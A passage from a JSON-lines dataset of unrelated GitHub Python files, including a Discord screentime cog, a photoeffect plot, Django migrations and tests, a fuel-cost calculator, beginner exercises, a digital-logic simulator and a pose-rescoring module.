ctx.warn(\"No data found for this member\")\n\n now = datetime.now()\n DATASET = [\n i for i in data if (now - datetime.fromisoformat(i[5])).days <= 30\n ]\n munch = sorted(\n map(list, DATASET),\n key=lambda x: datetime.fromisoformat(x[5]),\n reverse=True\n )\n online = round(sum([i[1] for i in munch])/60/60, 2)\n idle = round(sum([i[2] for i in munch])/60/60, 2)\n dnd = round(sum([i[3] for i in munch])/60/60, 2)\n offline = round(sum([i[4] for i in munch])/60/60, 2)\n\n if not any([online, idle, dnd, offline]):\n return await ctx.warn(\"No data **found** for this member\")\n \n chart = await self.bot.loop.run_in_executor(None, GenerateChart, data, member, 31)\n \n file = File(f'./data/new_status/{chart}', filename=\"pie.png\")\n\n await ctx.reply(files=[file])\n\n try:\n await asyncio.sleep(4)\n os.remove(f'./data/new_status/{chart}')\n except:\n raise\n\n\nasync def setup(bot: Lair) -> None:\n await bot.add_cog(Screentime(bot=bot))","repo_name":"hifthot/skidcity","sub_path":"lair/cogs/screentime.py","file_name":"screentime.py","file_ext":"py","file_size_in_byte":8629,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"70500312485","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom uncertainties import ufloat\n\nI,U = np.genfromtxt('Daten/c.txt',unpack= True)\nU2,I2 = np.genfromtxt('Daten/c2.txt',unpack= True)\n\nI2m = np.mean(I2)\nN = 27\ndI2 = np.sqrt(N/(N-1)*np.mean((I2-I2m)**2))\nI2w = ufloat(I2m,dI2)\n\nx = np.linspace(-23,23)\nplt.plot(x,0*x+I2m,'r-', label = r'Mittelwert Gegenstrom')\nplt.plot((0,0),(-0.3,8), 'b--', label = r'Bremsspannung')\nplt.plot(I,U,'kx',label=r'Messwerte')\n\nprint('Mittelwert Ig:',I2w)\n\nplt.legend(loc='best')\nplt.ylim(-0.4, 7)\nplt.xlim(-20,20)\nplt.grid()\nplt.xlabel(r'$U/\\si{\\volt}$')\nplt.ylabel(r'$I/\\si{\\nano\\ampere}$')\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\nplt.savefig('build/c.pdf')\n","repo_name":"JLammering/Physikalisches-Praktikum","sub_path":"25 Photoeffekt/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24321951108","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('async_notifications', '0002_auto_20160515_0018'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TemplateContext',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('code', models.CharField(verbose_name='Code', max_length=50)),\n ('context_dic', models.TextField(verbose_name='Context dictionary')),\n ],\n options={\n 'verbose_name': 'Context of template',\n 'verbose_name_plural': 'Context of template',\n },\n ),\n ]\n","repo_name":"Solvosoft/async_notifications","sub_path":"async_notifications/migrations/0003_templatecontext.py","file_name":"0003_templatecontext.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"11910963429","text":"#calculates gas consumption, prices and carbon footprint \r\nimport pandas as pd\r\nimport datetime\r\nimport calendar\r\n\r\ncarEff = 9.78 #Kilometres/Litre for a 2011 ford escape 4 cyl, auto 6 speed from fuelexonomy.gov\r\nplaneEff = 3.2 #industry average of litres per km per passenger \r\nvehCarbEff = 2.35 #average kg of carbon dioxide per litre of gas consumed \r\nplaneCarbEff = 3.15 #average kg of CO2 per litre of jet fuel consumed\r\n\r\ndef fuelUsed(disTotal): #finds litres of gas used in a car that month\r\n carLitres = disTotal/carEff\r\n return carLitres\r\n\r\ndef planeFuelUsed(planeTotal): #finds litres of gas used in a plane that month\r\n planeLitres = planeEff*planeTotal\r\n return planeLitres\r\n\r\ndef carbonUsed(vehLitres, planeLitres): #finds total carbon output that month\r\n vehCarb = vehCarbEff*vehLitres \r\n planeCarb = planeCarbEff*planeLitres\r\n totalCarb = vehCarb + planeCarb\r\n return totalCarb\r\n\r\n#returns cost of gas for selected month based on approximate gas used and average gas price for that month in Vancvouer, BC\r\ndef gasPrices(month, year, vehLitres):\r\n month = month.capitalize()\r\n month = month[:3] #taking first three chars of the motnh to match the monthDic\r\n\r\n gasPriceDic = dict()\r\n monthDic = {month: index for index, month in enumerate(calendar.month_abbr) if month} #creats a dictionary with months as keys, numbers as values\r\n argDateKey = year + '-' + str(monthDic[month]) #key to be used is gasPriceDic. matches dateKey\r\n\r\n #excel sheet import\r\n data = pd.read_excel(r'C:\\Users\\fitcr\\MyPythonScripts\\py4e\\GoogleMaps API\\gasPricesVan.xlsx')\r\n df = pd.DataFrame(data, columns=['Month', 'Price']) #create data frame\r\n\r\n #creats a dictionary with year-month as keys and prices as values\r\n for row in df.itertuples(): #iterates through each row of the dataframe\r\n exMonth = row.Month\r\n price = row.Price\r\n datee = datetime.datetime.strptime(str(exMonth), '%Y-%m-%d %H:%M:%S') #converts to easier to use datetime\r\n dateKey = str(datee.year) + '-' + str(datee.month) #creates year-month key for dictionary\r\n gasPriceDic[dateKey] = (price/100) #adds to dic\r\n\r\n gasPrice = gasPriceDic[argDateKey]\r\n totalCost = gasPrice*vehLitres\r\n return totalCost\r\n\r\n\r\n\r\n","repo_name":"brysonorth/Maps-Timeline-Data","sub_path":"fuelData.py","file_name":"fuelData.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29503092861","text":"# %% Q1)\nfrom itertools import count\n\nfrom macpath import join\n\n\ndef find_the_difference(s, t):\n sum_s, sum_t = 0, 0\n if len(s)==0: return t\n for i in s:\n sum_s += ord(i)\n for i in t:\n sum_t += ord(i)\n\n return chr(sum_t - sum_s)\n\nprint(find_the_difference('abcd', 'abcde'))\nprint(find_the_difference('', 'y'))\nprint(find_the_difference('ae', 'aea'))\n# %% Q2)\n\n#[int, str, bool, list, tuple, dictionary]\n\ndef count_datatypes(*args):\n dt = {\n int:0,\n str:0,\n bool:0,\n list:0,\n tuple:0,\n dict:0\n }\n for i in list(args):\n dt[type(i)] += 1\n return list(dt.values())\n\nprint(count_datatypes(1,45,'HI', False))\nprint(count_datatypes([10, 20], (\"t\", \"Ok\"), 2, 3, 1))\nprint(count_datatypes(\"Hello\", \"Bye\", True, True, False, {\"1\": \"One\", \"2\": \"Two\"}, [1,\n3], {\"Brayan\": 18}, 25, 23))\nprint(count_datatypes(4, 21, (\"ES\", \"EN\"), (\"a\", \"b\"), False, [1, 2, 3], [4, 5, 6]))\n# %% Q3)\ndef fib_str(n, chars):\n ans = [chars[0], chars[1]]\n for i in range(2,n):\n ans.append(ans[i-1] + ans[i-2])\n print(', '.join(ans))\n\nfib_str(3, [\"j\", \"h\"]) \nfib_str(5, [\"e\", \"a\"]) \nfib_str(6, [\"n\", \"k\"]) \n# %%Q4)\ndef ones_threes_nines(num):\n ans = {\n 'nines':0,\n 'threes':0,\n 'ones':0\n }\n n = num\n while n>0:\n if n>=9:\n ans['nines'] += 1\n n = n- 9\n elif n>=3:\n ans['threes'] += 1\n n = n - 3\n else:\n ans['ones'] += 1\n n = n - 1\n print(ans)\n\nones_threes_nines(10)\nones_threes_nines(15)\nones_threes_nines(22)\n\n\n# %% Q5)\ndef fib(n):\n if n==0: return 0\n a, b = 0, 1\n for i in range(2,n):\n c = a + b\n a = b\n b = c\n \n return a+b\n\nprint(fib(5))\nprint(fib(2))\nprint(fib(7))\nprint(fib(8))\nprint(fib(9))\n\n# %%\n","repo_name":"krisskrosscode/Python_practice_projects","sub_path":"iNeuron_py_ass/adv_ass_06.py","file_name":"adv_ass_06.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5729744245","text":"import csv\n\ndataset_1 = []\ndataset_2 = []\n\nwith open(\"1.csv\", \"r\") as f:\n csv_reader = csv.reader(f)\n\n for row in csv_reader:\n dataset_1.append(row)\n\nwith open(\"2_sorted_new.csv\", \"r\") as f:\n csv_reader = csv.reader(f)\n\n for row in csv_reader:\n dataset_2.append(row)\n\nheaders_1 = dataset_1[0]\nplanet_data_1 = dataset_1[1:]\n\nheaders_2 = dataset_2[0]\nplanet_data_2 = dataset_2[1:]\n\nmain_headers = headers_1 + headers_2\nmain_planet_data = []\n\nfor index, data in enumerate(planet_data_1):\n main_planet_data.append(planet_data_1[index] + planet_data_2[index])\n\nwith open(\"final_space.csv\", \"a+\") as f:\n csv_writer = csv.writer(f)\n csv_writer.writerow(main_headers)\n csv_writer.writerows(main_planet_data)","repo_name":"Alien178/Python-Projects","sub_path":"WhiteHatJr_Python_Projects/ICP - Data Pre-Processing/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30328005564","text":"def atm():\n print(\"1-Cash Withdraw 2-Cash Deposit\\n3-Set Pin 4-Check Balance\")\n n = (input())\n if n == '1':\n def cashwithdraw():\n print(\"How Much Money You Want To Withdraw\")\n n1 = int(input())\n print(n1,\"₹ Rupees Has Been Deducted From your Account\")\n cashwithdraw()\n elif n == '2':\n def cashdeposit():\n print(\"How Much Money You Want To Deposit\")\n n1 = int(input())\n print(n1, \"₹ Rupees Has Been Added in your Account\")\n cashdeposit()\n elif n == '3':\n def setpin():\n print(\"Set Your Pin No\")\n n1 = int(input())\n print(\"Your Pin No is =\",n1)\n setpin()\n elif n == '4':\n def checkbalance():\n print(\"Total Balance =1000000000000000000₹\")\n checkbalance()\nwhile True:\n atm()\n\n","repo_name":"sangampatel/pythonproject","sub_path":"pythonproject/basicatm.py","file_name":"basicatm.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23704848790","text":"\"\"\"\n=============================================================\nc:/1work/Python/djcode/tfat/tfat/tests/test_joepublic_model.py\nCreated: 18 Jun 2015 12:05:51\n\n\nDESCRIPTION:\n\nTests of the methods associated with the tag report model.\n\nA. Cottrill\n=============================================================\n\"\"\"\n\nimport pytz\nfrom tfat.models import Recovery\n\nfrom tfat.tests.factories import *\n\nimport pytest\n\n\n@pytest.fixture()\ndef db_setup():\n\n report_date = datetime(2010, 10, 10).replace(tzinfo=pytz.UTC)\n species = SpeciesFactory()\n\n angler1 = JoePublicFactory.create(\n first_name=\"Homer\",\n last_name=\"Simpson\",\n address1=\"742 Evergreen Tarrace\",\n address2=\"Box 123\",\n town=\"Springfield\",\n province=\"Ontario\",\n postal_code=\"N0W2T2\",\n email=\"hsimpson@hotmail.com\",\n phone=\"555-321-1234\",\n )\n\n angler2 = JoePublicFactory.create(first_name=\"Montgomery\", last_name=\"Burns\")\n\n # report filed by Homer\n report = ReportFactory(reported_by=angler1, report_date=report_date)\n tagids = [\"111111\", \"222222\", \"333333\"]\n for tag in tagids:\n recovery = RecoveryFactory(report=report, species=species, tagid=tag)\n\n # a report filed by Monty Burns\n report = ReportFactory(reported_by=angler1, follow_up=True, report_date=report_date)\n\n tagids = [\"4444\", \"5555\"]\n for tag in tagids:\n recovery = RecoveryFactory(report=report, species=species, tagid=tag)\n\n\n@pytest.mark.django_db\ndef test_str_complete():\n \"\"\"if an angler (joe public) has both first name and an initial, the\n __str__ should return {first_name} {initial}. {last_name}\"\"\"\n\n names = {\"first_name\": \"Homer\", \"initial\": \"J\", \"last_name\": \"Simpson\"}\n\n angler = JoePublicFactory(\n first_name=names.get(\"first_name\"),\n initial=names.get(\"initial\"),\n last_name=names.get(\"last_name\"),\n )\n\n should_be = \"{first_name} {initial}. {last_name}\"\n assert str(angler) == should_be.format(**names)\n\n\n@pytest.mark.django_db\ndef test_str_no_initial():\n \"\"\"if an angler (joe public) has both first name and an initial, the\n __str__ should return {first_name} {last_name}\"\"\"\n\n names = {\"first_name\": \"Homer\", \"last_name\": \"Simpson\"}\n\n angler = JoePublicFactory(\n first_name=names.get(\"first_name\"),\n initial=None,\n last_name=names.get(\"last_name\"),\n )\n should_be = \"{first_name} {last_name}\"\n\n assert str(angler) == should_be.format(**names)\n\n\n# @pytest.mark.django_db\n# def test_str_last_name_only():\n# '''if an angler (joe public) only has a last_name, the\n# __str__ method should return just the last_name'''\n#\n# names = {'last_name':'Simpson'}\n#\n# angler = JoePublicFactory(first_name=None,\n# initial=None,\n# last_name=names.get('last_name'))\n# assert str(angler) == names['last_name']\n\n\n@pytest.mark.django_db\ndef test_joepublic_report_count(db_setup):\n \"\"\"the report count() method of a JoePublic object should be the number\n of tag reports they have filed.\n \"\"\"\n # homer has 2 reports, monty has 0\n\n homer = JoePublic.objects.get(first_name=\"Homer\")\n assert homer.report_count() == 2\n\n monty = JoePublic.objects.get(first_name=\"Montgomery\")\n assert monty.report_count() == 0\n\n\n@pytest.mark.django_db\ndef test_joepublic_tag_count(db_setup):\n \"\"\"the tag_count() method of a JoePublic object should be the number\n of tags tehy have reported (summed across all reports)\n \"\"\"\n # homer has 5 tags, monty has 0\n\n homer = JoePublic.objects.get(first_name=\"Homer\")\n assert homer.tag_count() == 5\n\n monty = JoePublic.objects.get(first_name=\"Montgomery\")\n assert monty.tag_count() == 0\n","repo_name":"AdamCottrill/TFAT","sub_path":"tfat/tests/test_joepublic_model.py","file_name":"test_joepublic_model.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39078769153","text":"\"\"\"Module containg abstractions which are used to implement digital logic. The objects in this module aren't physical entities as much as concepts in digital logic\"\"\"\n\nfrom collections import defaultdict, namedtuple, deque\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass Wire:\n \"\"\"\n Wire represents a bit of data. Changes to Wire create Events which\n are notified to updater.\n\n Wires are immutable therefore they are the correct candidates for event\n generation.\n \n Wire must be assigned an instance of Updater before use.\n If auto_update is True, Wire will call updater.update() every time\n a set is made\n \"\"\"\n Event = namedtuple('Event', ('obj'))\n updater = None\n auto_update = True\n def __init__(self, bit=0):\n self._bit = 0\n self.bit = bit\n\n def __repr__(self):\n s = '{}: bit={}; id={}'\n return s.format(self.__class__, self.bit, id(self))\n\n @property\n def bit(self):\n return self._bit\n \n def __repr__(self):\n s = '{}: bit={}; id={}'\n return s.format(self.__class__, self.bit, id(self))\n\n\n @bit.setter\n def bit(self, value):\n if self._bit == value:\n return\n self._bit = value\n event = self.Event(self)\n self.updater.notify(event)\n if not self.updater.updating and self.auto_update:\n self.updater.update()\n \nclass StaticWire:\n \"\"\"\n Like wire but does not support assignment.\n Used exclusively for Bus.vdd and Bus.gnd.\n \"\"\"\n def __init__(self, bit):\n self._bit = bit\n\n @property\n def bit(self):\n return self._bit\n \n @bit.setter\n def bit(self, value):\n e = TypeError('StaticWire does not support assignment')\n logger.exception(e)\n raise e\n\nclass Signal:\n \"\"\"\n Signal abstracts digital signals and is used to set values on a Bus.\n Signal provides an API to deal with digital signals. The data carried by\n a Bus is encoded as a Signal. Signal provides methods to perform logical operations\n that take Signal objects as operands and return a new instace of Signal.\n \"\"\"\n def __init__(self, value, size):\n if type(value) is int:\n self.value = value\n else:\n msg = 'Argument of type {} to {}. Must be an Integer'\n e = TypeError(msg.format(type(value), self.__class__))\n logger.exception(e)\n raise e\n self._size = size\n logger.debug(repr(self))\n\n @classmethod\n def from_wires(cls, wires):\n \"\"\"Initialize a signal object from a list of wires\"\"\"\n sig = 0\n for i, wire in enumerate(wires):\n sig |= wire.bit << i\n return cls(sig, len(wires))\n \n @property\n def bits(self):\n \"\"\"Convert value into a sequence of 0s and 1s, essentially\n a list with its binary representation.\n The 0th element of the sequence represents the 0th bit.\"\"\"\n return tuple(self.value >> i & 0x1 for i in range(self._size))\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __repr__(self):\n s = '{}: value={};'\n return s.format(self.__class__, hex(self.value))\n \n def __int__(self):\n return self.value\n \n def __str__(self):\n return hex(self.value)\n\n def complement(self):\n return Signal.NOT(self)\n \n @classmethod\n def NOT(cls, a):\n mask = 0\n for i in range(a._size):\n mask |= 1 << i\n value = ~a.value & mask\n return cls(value, a._size)\n\n @classmethod\n def OR(cls, a, b):\n value = a.value | b.value\n return cls(value, a._size)\n\n @classmethod\n def AND(cls, a, b):\n value = a.value & b.value\n return cls(value, a._size)\n\n @classmethod\n def XOR(cls, a, b):\n value = a.value ^ b.value\n return cls(value, a._size)\n\nclass Updater:\n \"\"\"\n Implementation of the Observer design pattern.\n\n Signal carriers in PDD are Wires. Any Wire that suffers a change will notify\n Updater of the event. A BaseCircuit is depedent on a group of Wires, meaning\n that any change made to those wires will change the circuit. Circuits then \n subscribe to Updater to be updated upon Wire changes.\n\n Handling events, presumably, begins a cascate of events by making changes\n to others Wires which notifies of further events. Updater's job for the cycle\n is done when no new events are generated by an update call.\n\n There is a maximum threshold (default 2**10, change within init) to Updater's number \n of calls per cycle in order to avoid deadlocks caused by improper circuits\n (e.g. unstable circuits or circuits with cyclic paths)\n \"\"\"\n def __init__(self, threshold=2**16):\n logger.info('Updater object created')\n self.auto_update = True\n self.threshold = threshold\n self.updating = False\n self.events = []\n self.relations = defaultdict(list)\n\n\n def subscribe(self, circuit, wires):\n \"\"\"The subscribed circuit will be updater when an event is sourced by \nany wire in wires\"\"\"\n logger.debug('Subscribed {} to {}'.format(circuit, len(wires)))\n for wire in wires:\n self.relations[id(wire)].append(circuit)\n\n def unsubscribe(self, circuit, wires):\n \"\"\"Circuit will no longer be updated upon change made to wire in wires\"\"\"\n for wire in wires:\n logger.debug('Unsubscribed {} from {}'.format(circuit, len(wires)))\n try:\n self.relations[id(wire)].remove(circuit)\n except ValueError:\n pass\n\n def notify(self, event):\n \"\"\"Notifies Updater of new event, adds it to list of events\"\"\"\n logger.debug('New Updater event: ' + repr(event))\n self.events.append(event)\n \n def update(self):\n \"\"\"Handle all events from this cycle until list is empty or threshold blows up.\n\n Handle all events in self.events. Events are handled in a FIFO manner\n and handling events is likely to cause more events to be generated.\n\n If the number of events in the cycle exceed threshold, raises a Runtime error\n with the last circuits handled.\n \"\"\"\n #should change to a Breadth first algorithm\n logger.info('Handling events')\n self.updating = True\n deque_len = 50\n last = deque([None]*deque_len, maxlen=deque_len)\n for i in range(self.threshold):\n try:\n event = self.events.pop(0)\n except IndexError:\n self.updating = False\n break\n logger.debug('Handling event {}'.format(event))\n for circuit in self.relations[id(event.obj)]:\n last.append(circuit)\n logger.debug('updating circuit {}'.format(circuit))\n circuit.update()\n else:\n self.updating = False\n error_str = 'Update threshold blew up; check for cyclic path.'\n error = RuntimeError(error_str, last)\n raise error\n","repo_name":"Lodek/pdd","sub_path":"pdd/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30346321689","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport pickle\nimport models\nfrom pycocotools.cocoeval import COCOeval as COCOEval\nfrom crowdposetools.cocoeval import COCOeval as CrowdposeEval\n\nJOINT_COCO_LINK_1 = [0, 0, 1, 1, 2, 3, 4, 5, 5, 5, 6, 6, 7, 8, 11, 11, 12, 13, 14]\nJOINT_COCO_LINK_2 = [1, 2, 2, 3, 4, 5, 6, 6, 7, 11, 8, 12, 9, 10, 12, 13, 14, 15, 16]\n\nJOINT_CROWDPOSE_LINK_1 = [12, 13, 13, 0, 1, 2, 3, 0, 1, 6, 7, 8, 9, 6, 0]\nJOINT_CROWDPOSE_LINK_2 = [13, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 7, 1]\n\n\n# Data process for the RescoreNet\ndef read_rescore_data(cfg):\n train_file = cfg.RESCORE.DATA_FILE\n num_joints = cfg.DATASET.NUM_JOINTS\n x_train, y_train = get_joint(train_file, num_joints)\n feature_train = get_feature(x_train, cfg.DATASET.DATASET)\n return feature_train, y_train\n\n\ndef get_joint(filename, num_joints):\n obj = pickle.load(open(filename, \"rb\"))\n\n posx, posy = [], []\n for i in range(1, len(obj)):\n pose = list(np.concatenate(\n (obj[i][0], obj[i][1]), axis=1).reshape(3*num_joints))\n posx.append(pose)\n if obj[i][2] == 1:\n obj[i][2] = 0\n posy.append(obj[i][2])\n\n x = np.array(posx)\n y = np.array(posy)\n\n x = x.reshape((-1, num_joints, 3))\n y = torch.tensor(y.reshape((-1, 1)), dtype=torch.float)\n return x, y\n\n\ndef get_feature(x, dataset):\n joint_abs = x[:, :, :2]\n vis = x[:, :, 2]\n\n if 'coco' in dataset:\n joint_1, joint_2 = JOINT_COCO_LINK_1, JOINT_COCO_LINK_2\n elif 'crowd_pose' in dataset:\n joint_1, joint_2 = JOINT_CROWDPOSE_LINK_1, JOINT_CROWDPOSE_LINK_2\n else:\n raise ValueError(\n 'Please implement flip_index for new dataset: %s.' % dataset)\n\n #To get the Delta x Delta y\n joint_relate = joint_abs[:, joint_1] - joint_abs[:, joint_2]\n joint_length = ((joint_relate**2)[:, :, 0] +\n (joint_relate**2)[:, :, 1])**(0.5)\n\n #To use the torso distance to normalize\n normalize = (joint_length[:, 9]+joint_length[:, 11])/2\n normalize = np.tile(normalize, (len(joint_1), 2, 1)).transpose(2, 0, 1)\n normalize[normalize < 1] = 1\n\n joint_length = joint_length/normalize[:, :, 0]\n joint_relate = joint_relate/normalize\n joint_relate = joint_relate.reshape((-1, len(joint_1)*2))\n\n feature = [joint_relate, joint_length, vis]\n feature = np.concatenate(feature, axis=1)\n feature = torch.tensor(feature, dtype=torch.float)\n return feature\n\n\n# Train and Valid for RescoreNet\ndef rescore_fit(cfg, model, x_data, y_data):\n loss_fn = nn.MSELoss(reduction='mean')\n train_losses = []\n\n optimizer = torch.optim.Adam(model.parameters(), lr=cfg.RESCORE.LR)\n\n x_data = Variable(x_data, requires_grad=True)\n y_data = Variable(y_data, requires_grad=True)\n\n save_final_model_file = cfg.RESCORE.MODEL_FILE\n for epoch in range(cfg.RESCORE.END_EPOCH):\n train_loss = train_core(x_data, y_data, optimizer, model,\n loss_fn, cfg.RESCORE.BATCHSIZE)\n train_losses.append(train_loss)\n\n if epoch % 1 == 0:\n print(\"step:\", epoch+1, \"train_loss:\", train_loss)\n\n torch.save(model.state_dict(), save_final_model_file)\n return train_losses\n\n\ndef train_core(x_data, y_data, optimizer, model, loss_fn, batchsize):\n datasize = len(x_data)\n loss_sum = 0\n index = np.arange(datasize)\n np.random.shuffle(index)\n for i in range(int(datasize/batchsize)):\n x_temp = x_data[index[i*batchsize:(i+1)*(batchsize)]]\n y_temp = y_data[index[i*batchsize:(i+1)*(batchsize)]]\n model.train()\n optimizer.zero_grad()\n y_pred = model(x_temp)\n\n loss = loss_fn(y_pred, y_temp)\n loss.backward()\n optimizer.step()\n loss_sum += loss.item()\n\n return loss_sum/int(datasize/batchsize)\n\n\ndef rescore_valid(cfg, temp, ori_scores):\n temp = np.array(temp)\n\n feature = get_feature(temp, cfg.DATASET.DATASET)\n feature = feature.cuda()\n\n PredictOKSmodel = eval('models.'+'predictOKS'+'.get_pose_net')(\n cfg, feature.shape[1], is_train=False\n )\n pretrained_state_dict = torch.load(cfg.RESCORE.MODEL_FILE)\n need_init_state_dict = {}\n for name, m in pretrained_state_dict.items():\n need_init_state_dict[name] = m\n PredictOKSmodel.load_state_dict(need_init_state_dict, strict=False)\n PredictOKSmodel = torch.nn.DataParallel(\n PredictOKSmodel, device_ids=cfg.GPUS).cuda()\n PredictOKSmodel.eval()\n\n scores = PredictOKSmodel(feature)\n scores = scores.cpu().numpy()\n scores[np.isnan(scores)] = 0\n mul_scores = scores*np.array(ori_scores).reshape(scores.shape)\n scores = [np.float(i) for i in list(scores)]\n mul_scores = [np.float(i) for i in list(mul_scores)]\n return mul_scores\n\n\n# Get Rescore training data for RescoreNet\nclass COCORescoreEval(COCOEval):\n def __init__(self, cocoGt=None, cocoDt=None, iouType='segm'):\n COCOEval.__init__(self, cocoGt, cocoDt, iouType)\n self.summary = [['pose', 'pose_heatval', 'oks']]\n \n def evaluateImg(self, imgId, catId, aRng, maxDet):\n '''\n get predicted pose and oks score for single category and image\n change self.summary\n '''\n p = self.params\n if p.useCats:\n gt = self._gts[imgId,catId]\n dt = self._dts[imgId,catId]\n else:\n gt = [_ for cId in p.catIds for _ in self._gts[imgId,cId]]\n dt = [_ for cId in p.catIds for _ in self._dts[imgId,cId]]\n if len(gt) == 0 and len(dt) ==0:\n return None\n \n for g in gt:\n if g['ignore'] or (g['area']aRng[1]):\n g['_ignore'] = 1\n else:\n g['_ignore'] = 0\n\n # sort dt highest score first, sort gt ignore last\n gtind = np.argsort([g['_ignore'] for g in gt], kind='mergesort')\n gt = [gt[i] for i in gtind]\n dtind = np.argsort([-d['score'] for d in dt], kind='mergesort')\n dt = [dt[i] for i in dtind[0:maxDet]]\n # load computed ious\n ious = self.ious[imgId, catId][:, gtind] if len(self.ious[imgId, catId]) > 0 else self.ious[imgId, catId]\n\n gtIg = np.array([g['_ignore'] for g in gt])\n if not len(ious)==0:\n for dind, d in enumerate(dt):\n # information about best match so far (m=-1 -> unmatched)\n iou = 0\n m = -1\n for gind, g in enumerate(gt):\n #if not iscrowd[gind]:\n # continue\n # if dt matched to reg gt, and on ignore gt, stop\n if m>-1 and gtIg[m]==0 and gtIg[gind]==1:\n break\n # continue to next gt unless better match made\n if ious[dind,gind] < iou:\n continue\n # if match successful and best so far, store appropriately\n iou=ious[dind,gind]\n m=gind\n \n dtkeypoint = np.array(d['keypoints']).reshape((17,3))\n self.summary.append([dtkeypoint[:,:2], dtkeypoint[:,2:], iou])\n\n def dumpdataset(self, data_file):\n pickle.dump(self.summary, open(data_file, 'wb'))\n\n\n\nclass CrowdRescoreEval(CrowdposeEval):\n def __init__(self, cocoGt=None, cocoDt=None, iouType='segm'):\n CrowdposeEval.__init__(self, cocoGt, cocoDt, iouType)\n self.summary = [['pose', 'pose_heatval', 'oks']]\n \n def evaluateImg(self, imgId, catId, aRng, maxDet):\n '''\n get predicted pose and oks score for single category and image\n change self.summary\n '''\n p = self.params\n if p.useCats:\n gt = self._gts[imgId, catId]\n dt = self._dts[imgId, catId]\n else:\n gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]\n dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]\n if len(gt) == 0 and len(dt) == 0:\n return None\n \n for g in gt:\n tmp_area = g['bbox'][2] * g['bbox'][3] * 0.53\n if g['ignore'] or (tmp_area < aRng[0] or tmp_area > aRng[1]):\n g['_ignore'] = 1\n else:\n g['_ignore'] = 0\n\n # sort dt highest score first, sort gt ignore last\n gtind = np.argsort([g['_ignore'] for g in gt], kind='mergesort')\n gt = [gt[i] for i in gtind]\n dtind = np.argsort([-d['score'] for d in dt], kind='mergesort')\n dt = [dt[i] for i in dtind[0:maxDet]]\n # load computed ious\n ious = self.ious[imgId, catId][:, gtind] if len(\n self.ious[imgId, catId]) > 0 else self.ious[imgId, catId]\n\n gtIg = np.array([g['_ignore'] for g in gt])\n if not len(ious)==0:\n for dind, d in enumerate(dt):\n # information about best match so far (m=-1 -> unmatched)\n iou = 0\n m = -1\n for gind, g in enumerate(gt):\n #if not iscrowd[gind]:\n # continue\n # if dt matched to reg gt, and on ignore gt, stop\n if m>-1 and gtIg[m]==0 and gtIg[gind]==1:\n break\n # continue to next gt unless better match made\n if ious[dind,gind] < iou:\n continue\n # if match successful and best so far, store appropriately\n iou=ious[dind,gind]\n m=gind\n \n dtkeypoint = np.array(d['keypoints']).reshape((14,3))\n self.summary.append([dtkeypoint[:,:2], dtkeypoint[:,2:], iou])\n\n def dumpdataset(self, data_file):\n pickle.dump(self.summary, open(data_file, 'wb'))\n\n\n\n\n","repo_name":"HRNet/DEKR","sub_path":"lib/utils/rescore.py","file_name":"rescore.py","file_ext":"py","file_size_in_byte":9946,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"52"} +{"seq_id":"12059292900","text":"from collections import namedtuple\nimport json\nimport os.path\n\nfrom openpyxl import load_workbook\nimport requests\n\nDATA_DIR = 'source_files/electorate-profiles-2016'\nJS_FILE = 'src/states.js'\nE_VOTES = {\n 'Alabama': 9, 'Alaska': 3, 'Arizona': 11, 'Arkansas': 6, 'California': 55,\n 'Colorado': 9, 'Connecticut': 7, 'Delaware': 3, 'District of Columbia': 3,\n 'Florida': 29, 'Georgia': 16, 'Hawaii': 4, 'Idaho': 4, 'Illinois': 20,\n 'Indiana': 11, 'Iowa': 6, 'Kansas': 6, 'Kentucky': 8, 'Louisiana': 8,\n 'Maine': 4, 'Maryland': 10, 'Massachusetts': 11, 'Michigan': 16,\n 'Minnesota': 10, 'Mississippi': 6, 'Missouri': 10, 'Montana': 3,\n 'Nebraska': 5, 'Nevada': 6, 'New Hampshire': 4, 'New Jersey': 14,\n 'New Mexico': 5, 'New York': 29, 'North Carolina': 15, 'North Dakota': 3,\n 'Ohio': 18, 'Oklahoma': 7, 'Oregon': 7, 'Pennsylvania': 20,\n 'Rhode Island': 4, 'South Carolina': 9, 'South Dakota': 3,\n 'Tennessee': 11, 'Texas': 38, 'Utah': 6, 'Vermont': 3, 'Virginia': 13,\n 'Washington': 12, 'West Virginia': 5, 'Wisconsin': 10, 'Wyoming': 3,\n}\n\nVOTING_AGE_POP = 